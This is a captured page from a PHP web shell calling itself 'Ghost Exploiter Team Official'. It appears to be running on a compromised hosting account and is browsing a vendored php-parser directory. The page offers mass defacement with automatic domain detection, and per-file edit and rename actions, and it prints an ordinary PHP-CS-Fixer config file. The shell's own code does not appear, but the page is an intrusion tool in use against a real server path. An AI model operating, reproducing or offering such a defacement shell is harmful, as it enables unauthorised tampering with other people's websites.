webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
nikic
/
php-parser
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
bin
--
ren
lib
--
ren
.php-cs-fixer.dist.php
0.984KB
edt
ren
LICENSE
1.484KB
edt
ren
Makefile
0.179KB
edt
ren
README.md
6.156KB
edt
ren
composer.json
0.839KB
edt
ren
phpstan-baseline.neon
9.087KB
edt
ren
phpstan.neon.dist
0.123KB
edt
ren
<?php $finder = PhpCsFixer\Finder::create() ->exclude('PhpParser/Parser') ->in(__DIR__ . '/lib') ->in(__DIR__ . '/test') ->in(__DIR__ . '/grammar') ; $config = new PhpCsFixer\Config(); return $config->setRiskyAllowed(true) ->setRules([ '@PSR12' => true, // We use PSR12 with consistent brace placement. 'curly_braces_position' => [ 'functions_opening_brace' => 'same_line', 'classes_opening_brace' => 'same_line', ], // declare(strict_types=1) on the same line as <?php. 'blank_line_after_opening_tag' => false, 'declare_strict_types' => true, // Keep argument formatting for now. 'method_argument_space' => ['on_multiline' => 'ignore'], 'phpdoc_align' => ['align' => 'left'], 'phpdoc_trim' => true, 'no_empty_phpdoc' => true, 'no_superfluous_phpdoc_tags' => ['allow_mixed' => true], 'no_extra_blank_lines' => true, ]) ->setFinder($finder) ;